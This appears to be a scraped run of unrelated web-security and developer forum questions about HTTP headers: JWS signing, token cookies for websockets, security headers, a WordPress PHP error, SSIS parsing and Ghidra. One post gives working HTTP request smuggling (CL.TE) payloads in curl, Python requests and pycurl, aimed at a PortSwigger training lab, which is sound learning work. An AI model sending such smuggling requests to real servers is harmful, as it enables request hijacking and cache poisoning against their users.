JWS: signing HTTP headers

Looking over the spec for JSON Web Signature / JWS https://tools.ietf.org/html/rfc7515, I realise that it doesn’t seem to specify a method for signing HTTP headers.

Is there some way to use JWS to verify that HTTP headers were set by the same party that signed the JWS payload? [Or perhaps, suggest an alternative mechanism]

Python Script POST Body Containing CRLF Characters and Malformed Headers. HTTP Request Smuggling

Lately I have been attempting Portswiggers WebSecAcademy’s HTTP request smuggling labs with the additional challenge of writing a python script to complete the challenge for me.

Intended solution from Burp Repeater:

POST / HTTP/1.1 Host: ac971f2f1fe48ec180f863d5009000ed.web-security-academy.net User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 10 Transfer-Encoding: chunked  0  G  

If you right click and select ‘Copy as curl command’:

curl -i -s -k -X $  'POST' \     -H $  'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net' -H $  'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0' -H $  'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $  'Accept-Language: en-US,en;q=0.5' -H $  'Accept-Encoding: gzip, deflate' -H $  'Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te' -H $  'Connection: close' -H $  'Upgrade-Insecure-Requests: 1' -H $  'Content-Length: 8' \     --data-binary $  '0\x0d\x0a\x0d\x0aG\x0d\x0a\x0d\x0a' \     $  'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/' 

When attempting this with Curl, it returns 500 internal server error.

I have managed to complete this using the Python requests module:

def POST_CLTE():     url = 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'     headers = {'Host':'ac011f9b1f7e242780ce2272008a009d.web-security-academy.net','Connection':'keep-alive',     'Content-Type':'application/x-www-form-urlencoded','Content-Length':'8', 'Transfer-Encoding':'chunked'}      data = '0\x0d\x0a\x0d\x0aG\x0d\x0a'      s = requests.Session()     r = requests.Request('POST', url, headers=headers, data=data)     prepared = r.prepare()     response = s.send(prepared)      print(response.request.headers)     print(response.status_code)     print(response.text) 

But I don’t like that I have to pass the header in as a dict and it complains when I want to include an obfuscated header such as:

X: X[\n]Transfer-Encoding: chunked 

I’ve attempted to reproduce the request using PyCurl:

#!/usr/bin/python  import pycurl from StringIO import StringIO  buffer = StringIO() c = pycurl.Curl() c.setopt(c.POST, 1) c.setopt(c.URL, 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/') c.setopt(c.POSTFIELDS, '0\x0d\x0a\x0d\x0aG\x0d\x0a') #c.setopt(pycurl.POSTFIELDSIZE, 8) c.setopt(c.HTTPHEADER, [     'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0',     'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net',     'Content-Length: 8',     'Transfer-Encoding: chunked',     'Content-Type: application/x-www-form-urlencoded'     ]) #c.setopt(c.CRLF, 1) c.setopt(c.VERBOSE, 1) c.setopt(c.HEADER, 1) c.setopt(c.WRITEDATA, buffer) c.perform() c.close()  body = buffer.getvalue()  print(body) 

I like that I can pass the headers as an array of strings, but I unfortunately still get 500 internal server error:

*   Trying                                                                                                                             * TCP_NODELAY set                                                                                                                                            * Connected to ac561fd21ed819768081009200f2002e.web-security-academy.net ( port 443 (#0)                                                      * found 387 certificates in /etc/ssl/certs * ALPN, offering h2 * ALPN, offering http/1.1 * SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256 *        server certificate verification OK *        server certificate status verification SKIPPED *        common name: web-security-academy.net (matched) *        server certificate expiration date OK *        server certificate activation date OK *        certificate public key: RSA *        certificate version: #3 *        subject: CN=web-security-academy.net *        start date: Fri, 05 Jul 2019 00:00:00 GMT *        expire date: Wed, 05 Aug 2020 12:00:00 GMT *        issuer: C=US,O=Amazon,OU=Server CA 1B,CN=Amazon * ALPN, server did not agree to a protocol > POST / HTTP/1.1 Host: ac561fd21ed819768081009200f2002e.web-security-academy.net Accept: */* User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0  Content-Length: 8 Transfer-Encoding: chunked Content-Type: application/x-www-form-urlencoded  8 * upload completely sent off: 15 out of 8 bytes * Mark bundle as not supporting multiuse < HTTP/1.1 500 Internal Server Error < Content-Type: application/json; charset=utf-8 < Connection: close < Content-Length: 23 <  * Closing connection 0 HTTP/1.1 500 Internal Server Error Content-Type: application/json; charset=utf-8 Connection: close Content-Length: 23  "Internal Server Error" 

What is the reason for this behaviour? Are there any alternatives I haven’t explored? Any suggestions are much appreciated.

error (Undefined index) and (Cannot modify header information – headers already)


Notice: Undefined index: link_type in /home/golchind/public_html/wp-content/themes/golchindl/functions.php on line 40

Notice: Trying to get property of non-object in /home/golchind/public_html/wp-content/themes/golchindl/functions.php on line 58

Warning: Cannot modify header information – headers already sent by (output started at /home/golchind/public_html/wp-content/themes/golchindl/functions.php:40) in /home/golchind/public_html/wp-admin/admin-header.php on line 9

help :

line 40

$ type = $ _POST[‘link_type’];

line 58

update_post_meta($ post->ID,”_oscar_data”,json_encode(array(“episodes”=>$ episodes,”links”=>$ links,”type”=>$ type), JSON_UNESCAPED_UNICODE));

function oscar_meta_box_js(){     wp_enqueue_style( 'oscar_box_style',get_bloginfo('template_url')."/css/admin_meta_box.css");     wp_enqueue_script( 'oscar_box', get_bloginfo('template_url'). '/js/meta_boxes.js', array('jquery'),'1.0',true); } add_action( 'admin_enqueue_scripts', 'oscar_meta_box_js');   function oscar_meta_save(){     global $  post,$  meta_args,$  meta_dls;     $  type = $  _POST['link_type'];     $  episodes = array();     $  links = array();     if($  type == "serial"){         for($  i=0;$  i<count($  _POST['ep_name']);$  i++){             $  episodes[] = array("name"=>$  _POST['ep_name'][$  i],"quality"=>$  _POST['ep_quality'][$  i],"medium_size"=>$  _POST['ep_med'][$  i]);         }         for($  i=0;$  i<count($  _POST['link']);$  i++){             $  links[] = array("name"=>$  _POST['name'][$  i],"link"=>$  _POST['link'][$  i],"subtitle"=>$  _POST['subtitle'][$  i],"screenshot"=>$  _POST['screenshot'][$  i],"episode"=>$  _POST['episode'][$  i]);         }     } else if($  type == "movie") {         for($  i=0;$  i<count($  _POST['movie_title']);$  i++){             $  episodes[] = array("name"=>$  _POST['movie_title'][$  i]);         }         for($  i=0;$  i<count($  _POST['mlink']);$  i++){             $  links[] = array("name"=>$  _POST['mname'][$  i],"link"=>$  _POST['mlink'][$  i],"subtitle"=>$  _POST['msubtitle'][$  i],"screenshot"=>$  _POST['mscreenshot'][$  i],"episode"=>$  _POST['mtitle'][$  i]);         }     }     update_post_meta($  post->ID,"_oscar_data",json_encode(array("episodes"=>$  episodes,"links"=>$  links,"type"=>$  type), JSON_UNESCAPED_UNICODE)); }        function oscar_download(){     global $  post;     ?> <script> var $   = jQuery; $  (function(){     var data = '<?=get_post_meta($  post->ID,"_oscar_data",true);?>';     if(data != ""){         data = JSON.parse(data);         var type = data['type'];         data['episodes'].forEach(function(e){             if(type == "serial")                 add_ep(e['name'],e['quality'],e['medium_size'])             else                 add_title(e['name']);         });         data['links'].forEach(function(e){             if(type == "serial")                 add_link(e['name'],e['link'],e['subtitle'],e['screenshot'],e['episode'])             else                 add_mlink(e['name'],e['link'],e['subtitle'],e['screenshot'],e['episode'])         });         if(data['type']){           $  ("#link_type").val(data['type']);     }     }     normalize_links()     normalize_mlinks() }); </script> <?php if ('series' == get_post_type()) { ?> <div id="serial" class="content">     <div class="side_inp_keeper">         <input id="title_serial" type="text" placeholder="عنوان فصل">         <input id="quality_serial" type="text" placeholder="کیفیت">         <input id="med_serial" type="text" placeholder="میانگین حجم هم قسمت">         <button id="add_ep" class="button">افزودن</button>     </div>     <div id="episodes">      </div>     <hr>     <div class="links" style="display:none;">             <div class="side_inp_keeper">                 <select id="ep"></select>                 <input type="text" id="name" placeholder="عنوان لینک">                 <input type="text" id="link" placeholder="لینک دانلود">                 <input type="text" id="subtitle" placeholder="زیر نویس">                 <input type="text" id="screenshot" placeholder="نمونه کیفیت">                 <button id="add_link" class="button">افزودن</button>             </div>             <div id="links">              </div>         </div> </div> <?php } else if ('movies' == get_post_type()) { ?> <div id="movie" class="content">     <div class="side_inp_keeper">         <input type="text" name="movie_title" id="movie_title" placeholder="عنوان (مثال : زبان اصلی)"><button id="add_link_title" class="button">افزودن</button>     </div>     <div id="titles">      </div>     <hr>     <div class="mlinks">         <div class="side_inp_keeper">                     <select id="titl"></select>                     <input type="text" id="mname" placeholder="عنوان لینک">                     <input type="text" id="mlink" placeholder="لینک دانلود">                     <input type="text" id="msubtitle" placeholder="زیر نویس">                     <input type="text" id="mscreenshot" placeholder="نمونه کیفیت">                     <button id="add_mlink" class="button">افزودن</button>         </div>         <div id="mlinks">          </div>     </div> </div> <?php } ?> <input type="hidden" name="link_type" id="link_type" value="serial">     <?php }    function oscar_meta_boxes() {     add_meta_box( 'oscar_download',"باکس دانلود", 'oscar_download', array('movies', 'series'), 'normal', 'high' ); } add_action("save_post","oscar_meta_save"); add_action( 'add_meta_boxes', 'oscar_meta_boxes' ); 

SSIS 2017 – Parse flat file with multiple columns and headers on multiple lines

I receive a daily CSV file that contains 600+ company employee positions, each of which are formatted as follows:

Position,Description SUP1015,Shipping Supervisor Day Work UOM:,Hours,Active:,Yes,Permanent:,Yes,, Default Rate Level:,0,Default Rate Source:,Master,Default GL Source:,Master,, Effective Date:,,Expiry Date:,,Created Date:,29-Apr-2014,Revised Date:,06-Jun-2019 Job Class:,,,,,Location:,,1004 - Shipping,, Union Code:,,,,,Reports To:,,MGR1056 - Delivery & Shipping Manager,, Position FTE:,,1.0000,,,,,, 

My goal is to transform all 600+ records into one table:

Position | Description                     | Work UOM | Active | Permanent | Default Rate Level | Default Rate Source | Default GL Code | Effective Date | Expiry Date | Created Date | Revised Date | Job Class | Location                 | Union Code | Reports to                                    | Position FTE | ========================================================================================================================================================================================================================================================================================================================= SUP1015  | Shipping Supervisor Day         | Hours    | Yes    | Yes       | 0                  | Master              | Master          |                |             | 29-Apr-2014  | 06-Jun-2019  |           | 1004 - Shipping          |            | MGR1056 - Delivery & Shipping Manager         | 1.0000       | 

I have no idea how to parse this, given the connection managers in SSIS. Any help and guidance is greatly appreciated.

Is sending token authentication information via cookie headers secure?

i am by no means a security engineer , and i have barely started my journey as a web developer. Im utilizing a python package known as django for my backend , react.js for my front end . Recently i have incorporated django-channels , which is a package that gives me the ability to use websockets in my project. Since i have decoupled my front and backends , the basis of authentication im using is via tokens (will look into using jwt) .

The issue is that with javascript , it is not possible to send authentication headers via websocket connection (or so im told) , therefore a lot of people are using cookies to send this authentication token instead. Heres an example snippet of how i am sending the token from my front end:

 const path = wsStart + 'localhost:8000'+ loc.pathname     document.cookie = 'authorization=' + token + ';'      this.socketRef = new WebSocket(path) 

doing this allows me to then extract out the token information through utilizing a customized middleware on my backend .

import re from channels.db import database_sync_to_async from django.db import close_old_connections  @database_sync_to_async def get_user(token_key):     try:         return Token.objects.get(key=token_key).user     except Token.DoesNotExist:         return AnonymousUser()   class TokenAuthMiddleware:     """     Token authorization middleware for Django Channels 2     see:     https://channels.readthedocs.io/en/latest/topics/authentication.html#custom-authentication     """      def __init__(self, inner):         self.inner = inner      def __call__(self, scope):         return TokenAuthMiddlewareInstance(scope, self)   class TokenAuthMiddlewareInstance:     def __init__(self, scope, middleware):         self.middleware = middleware         self.scope = dict(scope)         self.inner = self.middleware.inner      async def __call__(self, receive, send):         close_old_connections()         headers = dict(self.scope["headers"])         print(headers[b"cookie"])         if b"authorization" in headers[b"cookie"]:             print('still good here')             cookies = headers[b"cookie"].decode()             token_key = re.search("authorization=(.*)(; )?", cookies).group(1)             if token_key:                 self.scope["user"] = await get_user(token_key)          inner = self.inner(self.scope)         return await inner(receive, send)    TokenAuthMiddlewareStack = lambda inner: TokenAuthMiddleware(AuthMiddlewareStack(inner)) 

However this has raised some form of security red flags (or so im told) .

Therefore i wish to extend this questions to the security veterans out there :

  1. Is this methodology of sending token authentication information via cookie headers safe?
  2. Is my implementation of this method safe?
  3. Is there a way to secure this even further?

Security headers in application vs. Tomcat default 40x error

I would like to assess the actual risk for various CORS attacks when a web application properly sets CSP and other response headers, but the app server error page does not. When a 40x can be provoked by trying to access protected content, for example, can the error response be used to inject malicious scripts, even though the web application is protected? I just can’t envision a scenario where this is done.

Or x-content-type-options: nosniff. It is missing from a 400 error page. Is this a real vulnerability? What can an attacker do with the error response?

Why does Chrome show 304 in Response Headers section but 200 in Status code?

Might be a silly question, but I haven’t found any clear answer yet. Why does Chrome show 304 in Response Headers section but 200 in Status code? Why doesn’t it show 304 in Status code (BTW, that is NOT 200 memory cache.)?

If it shows 200 I can’t know it is actually 304 without looking into request detail.

enter image description here

Compared to Firefox (the same request), 304 in status code.

enter image description here

Secure HTTP Headers – where should be implemented, WAF or code level?

I have an REST API exposed to the Internet and another application with form-based authentication.

These apps are behind Web Application Firewall.

Question is, where I should implement below Secure HTTP Headers, on WAF or Code level?

X-XSS-Protection X-Frame-Options X-Content-Type-Options X-Permitted-Cross-Domain-Policies HTTP Strict Transport Security HTTP Public Key Pinning Content Security Policy Referrer Policy Feature-Policy

HTTP security headers – do they have an effect on SEO and affiliate links?


my site was recently moved to WPX hosting and the programmer fixed some site speed issued, plus he added HTTP security headers to the .htaccess file.

The rating for my site is now A+ on https://securityheaders.com/

However, I checked 20+ websites (from small to super large) and every single has an F rating (or at best a D) – even super big, multi-billion dollar websites.

Why is that so? Fixing HTTP headers seems to be easy. Why nobody does it?

Also, I wonder if this has…

HTTP security headers – do they have an effect on SEO and affiliate links?

Ghidra Load Linux Headers [on hold]

I’m trying to reverse engineer a linux kernel module (kernel version 4.19). Ghidra does recognize correctly all function names such as: open, misc_register etc, but it cannot determinate their exact signatures.

Let’s take as an example function copy_from_user with signature:

unsigned long copy_from_user (void *to, const void __user *from, unsigned long n); 

and here’s how Ghidra sees it:

undefined _copy_from_user (void) 

I believe that it won’t be the last kernel module for me to reverse engineer and so I would like to learn how to load all missing kernel structures to the program.

Moreover I am aware that I can edit the function signature by hand, but I would then need to add plenty of structures by hand as well (such as struct file) and this would be very ineffective.

What I’ve tried so far

(I’m super new to Ghidra and if you know better way, please just share)

I’ve downloaded headers from debian repository:

$   wget linux-headers-4.19.0-6-common_4.19.67-2+deb10u2_all.deb . $   ls linux-headers-4.19.0-6-common_4.19.67-2+deb10u2_all.deb  usr $   ls /usr/src/ linux-headers-4.19.0-6-common 

I extracted and then tried to load them using File>>Parse C Source option by specifying the path to the extracted folder..

enter image description here

and got an error. What can I do to make Ghidra aware of the correct function signatures?

Update: As MechMK1 has pointed out I have provided a directory instead of header files. I’ve corrected my mistake and this time I’ve just copied the whole content of all files into all_headers.h

$   cat `find . | grep .h` > all_headers.h $   cat all_headers.h | wc -c 29824650 

And I’ve provided all_headers.h to get parsed. This time there was no error, but Ghidra has only added around 20 defines and no function signatures.

enter image description here

enter image description here